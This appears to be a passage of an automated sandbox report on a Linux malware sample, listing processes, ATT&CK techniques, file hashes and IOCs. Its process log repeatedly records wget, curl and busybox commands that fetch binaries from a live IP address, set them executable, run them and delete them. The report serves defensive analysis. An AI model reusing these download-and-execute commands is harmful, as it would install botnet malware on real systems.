PID:880

/usr/bin/wget
wget http://87.120.84.230/bins/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- System Network Configuration Discovery
PID:881

/usr/bin/curl
curl -O http://87.120.84.230/bins/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- System Network Configuration Discovery
PID:883

/bin/chmod
chmod 777 IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- File and Directory Permissions Modification
PID:884

/tmp/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
./IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:885

/bin/rm
rm IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- System Network Configuration Discovery
PID:886

/usr/bin/wget
wget http://87.120.84.230/bins/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
PID:887

/usr/bin/curl
curl -O http://87.120.84.230/bins/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:888

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
PID:889

/bin/chmod
chmod 777 MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
- File and Directory Permissions Modification
PID:890

/tmp/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
./MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
- Executes dropped EXE
PID:891

/bin/rm
rm MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
PID:892

/usr/bin/wget
wget http://87.120.84.230/bins/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
PID:893

/usr/bin/curl
curl -O http://87.120.84.230/bins/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:894

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
PID:895

/bin/chmod
chmod 777 FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
- File and Directory Permissions Modification
PID:896

/tmp/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
./FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
- Executes dropped EXE
PID:897

/bin/rm
rm FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
PID:898

/usr/bin/wget
wget http://87.120.84.230/bins/kyXctIZOIax78d4uua2NVa4ynVFwSJAgux
2⤵
PID:899

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/825-1-0xb66f6000-0xb6707044-memory.dmp

Download
memory/887-2-0xb66e0000-0xb66f1044-memory.dmp

Download
memory/887-3-0xb66c8000-0xb66d9044-memory.dmp

Download

ioc	pid	process
/tmp/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d	680	LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
/tmp/7j6jf7VSHinj3svXColG35DXP50gjiUCvo	688	7j6jf7VSHinj3svXColG35DXP50gjiUCvo
/tmp/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7	708	d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
/tmp/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv	730	kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
/tmp/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg	750	P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
/tmp/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT	761	7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
/tmp/kyXctIZOIax78d4uua2NVa4ynVFwSJAgux	783	kyXctIZOIax78d4uua2NVa4ynVFwSJAgux
/tmp/pdqTH4CquEljUTIPXTolnHhMbROjXTC898	799	pdqTH4CquEljUTIPXTolnHhMbROjXTC898
/tmp/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T	805	IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
/tmp/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK	811	MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
/tmp/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA	817	FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
/tmp/XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV	823	XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV
/tmp/jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J	829	jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J
/tmp/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5	835	xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
/tmp/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5	841	xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
/tmp/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv	847	kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
/tmp/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg	853	P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
/tmp/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT	859	7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
/tmp/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d	865	LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
/tmp/7j6jf7VSHinj3svXColG35DXP50gjiUCvo	873	7j6jf7VSHinj3svXColG35DXP50gjiUCvo
/tmp/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7	879	d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
/tmp/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T	885	IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
/tmp/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK	891	MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
/tmp/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA	897	FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads